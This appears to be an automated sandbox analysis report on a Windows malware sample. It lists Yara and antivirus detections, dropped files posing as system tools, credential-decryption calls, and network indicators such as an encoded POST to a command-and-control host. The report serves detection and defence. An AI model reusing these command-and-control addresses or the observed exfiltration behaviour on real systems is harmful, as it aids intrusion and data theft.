Source: Yara match | File source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.737013238.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.797076892.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.698706571.0000000001637000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000000.708127388.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: windef.exe PID: 5848, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED
Source: Yara match | File source: dropped/windef.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED
Multi AV Scanner detection for submitted file
Source: CVbJSUXraQ.exe | Virustotal: Detection: 73%
Source: CVbJSUXraQ.exe | Metadefender: Detection: 68%
Source: CVbJSUXraQ.exe | ReversingLabs: Detection: 86%
Antivirus / Scanner detection for submitted sample
Source: CVbJSUXraQ.exe | Avira: detected
Multi AV Scanner detection for domain / URL
Source: http://0x21.in:8000/_az/ | Virustotal: Detection: 5%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Virustotal: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | ReversingLabs: Detection: 93%
Source: C:\Users\user\AppData\Local\Temp\windef.exe | Virustotal: Detection: 85%
Source: C:\Users\user\AppData\Local\Temp\windef.exe | ReversingLabs: Detection: 93%
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe | ReversingLabs: Detection: 93%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\windef.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack | Avira: Label: TR/Hijacker.W
Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack | Avira: Label: TR/AD.Xiclog.nmpoi
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack | Avira: Label: TR/Hijacker.W
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack | Avira: Label: TR/AD.Xiclog.nmpoi
Source: 4.0.vnc.exe.ab0000.0.unpack | Avira: Label: TR/Hijacker.Gen
Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack | Avira: Label: TR/Hijacker.W
Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack | Avira: Label: TR/AD.Xiclog.nmpoi
Source: 4.2.vnc.exe.ab0000.0.unpack | Avira: Label: TR/Hijacker.Gen
Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack | Avira: Label: TR/Hijacker.W
Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack | Avira: Label: TR/AD.Xiclog.nmpoi
Source: 1.3.CVbJSUXraQ.exe.3800000.6.unpack | Avira: Label: TR/AD.MoksSteal.elw
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack | Avira: Label: TR/Hijacker.W
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack | Avira: Label: TR/AD.Xiclog.nmpoi
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack | Avira: Label: TR/Hijacker.W
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack | Avira: Label: TR/AD.Xiclog.nmpoi
Source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.unpack | Avira: Label: TR/AD.MoksSteal.elw
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C6A9BC CryptQueryObject,GetLastError,CryptMsgGetParam,CryptMsgGetParam,GetLastError,CertFindCertificateInStore,GetLastError,lstrcmpA,CryptDecodeObject,GetLastError,CryptDecodeObject,GetLastError,CertFreeCertificateContext,CertCloseStore,CryptMsgClose,5_2_00C6A9BC
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_0040A610 CryptUnprotectData,LocalFree,7_2_0040A610
Uses 32bit PE files
Source: CVbJSUXraQ.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
Checks for available system drives (often done to infect USB drives)
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | File opened: z:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | File opened: x:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | File opened: v:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | File opened: t:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | File opened: r:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | File opened: p:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | File opened: n:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | File opened: l:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | File opened: j:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | File opened: h:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | File opened: f:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | File opened: b:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | File opened: y:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | File opened: w:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | File opened: u:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | File opened: s:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | File opened: q:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | File opened: o:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | File opened: m:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | File opened: k:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | File opened: i:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | File opened: g:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | File opened: e:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | File opened: c:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | File opened: a:
Other signature evidence (signature name not preserved):
Source: Binary string: ntdll.pdb source: vnc.exe, 00000004.00000003.715734553.0000000003530000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: vnc.exe, 00000004.00000003.715734553.0000000003530000.00000004.00000001.sdmp
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00E1445A GetFileAttributesW,FindFirstFileW,FindClose,1_2_00E1445A
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C7FDA0 memset,lstrlenW,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,lstrcatW,memset,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,lstrcpyW,lstrcatW,lstrcatW,memset,RemoveDirectoryW,5_2_00C7FDA0
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C76554 memset,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,memset,FindFirstFileW,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,SetLastError,FindNextFileW,FindClose,SetLastError,5_2_00C76554
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C7FFA8 memset,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,lstrlenW,HeapAlloc,lstrcpyW,CreateDirectoryW,GetLastError,FindFirstFileW,GetLastError,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,HeapFree,5_2_00C7FFA8
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00E1445A GetFileAttributesW,FindFirstFileW,FindClose,7_2_00E1445A
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00413030 FindFirstFileW,FindNextFileW,FindClose,7_2_00413030
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_004119A8 FindFirstFileW,FindNextFileW,FindClose,7_2_004119A8
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_004119AC FindFirstFileW,FindNextFileW,FindClose,7_2_004119AC
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00412D6C FindFirstFileW,FindNextFileW,FindClose,7_2_00412D6C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_0041160C FindFirstFileW,FindNextFileW,FindClose,7_2_0041160C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,7_2_00413F58
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: 10_2_00AA445A GetFileAttributesW,FindFirstFileW,FindClose,10_2_00AA445A

                      Networking:

                      Uses known network protocols on non-standard ports
                      Source: unknown | Network traffic detected: HTTP traffic on port 49743 -> 8000
                      May check the online IP address of the machine
                      Source: C:\Users\user\AppData\Local\Temp\windef.exe | DNS query: name: ip-api.com
                      Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe | DNS query: name: ip-api.com
                      Source: global traffic | HTTP traffic detected: POST /_az/ HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) | Host: 0x21.in:8000 | Content-Length: 101 | Cache-Control: no-cache | Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 f0 4c 4e ed 3e 32 ed 3e 3c ed 3e 3d ed 3e 32 ed 3f 4e 8e 49 4c ed 3e 3c ed 3e 38 ed 3e 38 8d 28 39 fa 28 38 8c 4b 4f 8c 28 39 ff 28 39 f9 4e 2f fb 3e 4f ed 3e 32 | Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9LN>2><>=>2?NIL><>8>8(9(8KO(9(9N/>O>2
                      Source: global traffic | HTTP traffic detected: GET /json/ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0 | Host: ip-api.com | Connection: Keep-Alive
                      Source: global traffic | TCP traffic: 192.168.2.4:49743 -> 50.17.5.224:8000
                      Source: global traffic | TCP traffic: 192.168.2.4:49745 -> 5.8.88.191:8080
                      Source: CVbJSUXraQ.exe, 00000007.00000002.943097496.0000000003320000.00000004.00000001.sdmp | String found in binary or memory: http://0x21.in:8000/_az/
                      Source: windef.exe | String found in binary or memory: http://api.ipify.org/
                      Source: CVbJSUXraQ.exe, 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, windef.exe, 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp | String found in binary or memory: http://api.ipify.org/3
                      Source: CVbJSUXraQ.exe, 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, windef.exe, windef.exe, 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp | String found in binary or memory: http://freegeoip.net/xml/
                      Source: windef.exe, 00000006.00000002.713823415.00000000033AC000.00000004.00000001.sdmp | String found in binary or memory: http://ip-api.com
                      Source: CVbJSUXraQ.exe, SystemPropertiesPerformance.exe, 0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp | String found in binary or memory: http://ip-api.com/json
                      Source: CVbJSUXraQ.exe, 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, windef.exe, windef.exe, 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp | String found in binary or memory: http://ip-api.com/json/
                      Source: windef.exe, 00000006.00000002.713823415.00000000033AC000.00000004.00000001.sdmp | String found in binary or memory: http://ip-api.com40l
                      Source: windef.exe, 00000006.00000002.713962745.00000000033C3000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/
                      Source: windef.exe, 00000006.00000002.713823415.00000000033AC000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: CVbJSUXraQ.exe, SystemPropertiesPerformance.exe, 0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp | String found in binary or memory: https://dotbit.me/a/
                      Source: unknown | DNS traffic detected: queries for: 0x21.in
                      Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C6B070 socket,connect,setsockopt,send,recv,shutdown,closesocket,HeapFree,5_2_00C6B070
                      Source: unknown | Network traffic detected: HTTP traffic on port 49747 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49747
                      Source: unknown | TCP traffic detected without corresponding DNS query: 5.8.88.191
                      Source: unknown | HTTP traffic detected: POST /_az/ HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) | Host: 0x21.in:8000 | Content-Length: 101 | Cache-Control: no-cache | Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 f0 4c 4e ed 3e 32 ed 3e 3c ed 3e 3d ed 3e 32 ed 3f 4e 8e 49 4c ed 3e 3c ed 3e 38 ed 3e 38 8d 28 39 fa 28 38 8c 4b 4f 8c 28 39 ff 28 39 f9 4e 2f fb 3e 4f ed 3e 32 | Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9LN>2><>=>2?NIL><>8>8(9(8KO(9(9N/>O>2
                      Source: Yara match | File source: CVbJSUXraQ.exe, type: SAMPLE
                      Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.3.CVbJSUXraQ.exe.178a8e0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.f14fac.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.vnc.exe.ab6000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.0.svchost.exe.c9ac50.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.0.svchost.exe.cc5c50.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.svchost.exe.cc5c50.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.0.svchost.exe.c60000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.0.vnc.exe.ab0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.0.svchost.exe.cc5c50.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.0.svchost.exe.cc5c50.4.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.1924408.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.svchost.exe.c60000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.0.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.0.svchost.exe.c60000.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.0.svchost.exe.c60000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.vnc.exe.ae1000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.18f9408.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.3.CVbJSUXraQ.exe.1833408.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.0.svchost.exe.cc5c50.7.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.f14fac.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.3.CVbJSUXraQ.exe.175f8e0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.0.vnc.exe.ab6000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.vnc.exe.ab0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.svchost.exe.c9ac50.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.3.CVbJSUXraQ.exe.178a8e0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.0.svchost.exe.c9ac50.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.3.CVbJSUXraQ.exe.1833408.5.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.3.CVbJSUXraQ.exe.175f8e0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.3.CVbJSUXraQ.exe.1808408.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.0.svchost.exe.c9ac50.8.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.0.svchost.exe.c9ac50.5.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.f14fac.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.svchost.exe.cc5c50.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.0.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.0.svchost.exe.c9ac50.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.0.svchost.exe.cc5c50.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.18517b0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.0.svchost.exe.c60000.6.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.svchost.exe.c9ac50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.0.svchost.exe.c60000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.f14fac.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.0.vnc.exe.ae1000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.0.svchost.exe.cc5c50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.3.CVbJSUXraQ.exe.1808408.4.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.0.svchost.exe.c9ac50.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000015.00000002.946249267.00000000007F7000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000000.720379201.0000000000C88000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000015.00000002.945386236.00000000007C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.938560502.0000000000C9A000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000000.710171525.0000000000C97000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000003.672198694.000000000175C000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000000.708334830.0000000000C60000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000000.710041588.0000000000C60000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000000.708627891.0000000000C97000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000015.00000000.775754648.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000003.671945982.000000000175C000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000000.720440716.0000000000C9A000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000003.776203238.000000000184E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000016.00000002.938070643.0000000000260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000003.776024946.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000015.00000002.950447510.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000016.00000002.938168634.0000000000297000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
                      Source: Yara match | File source: dropped/vnc.exe, type: DROPPED
                      Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\vnc.exe, type: DROPPED
                      Source: Yara match | File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED
                      Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00DB2344 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,1_2_00DB2344
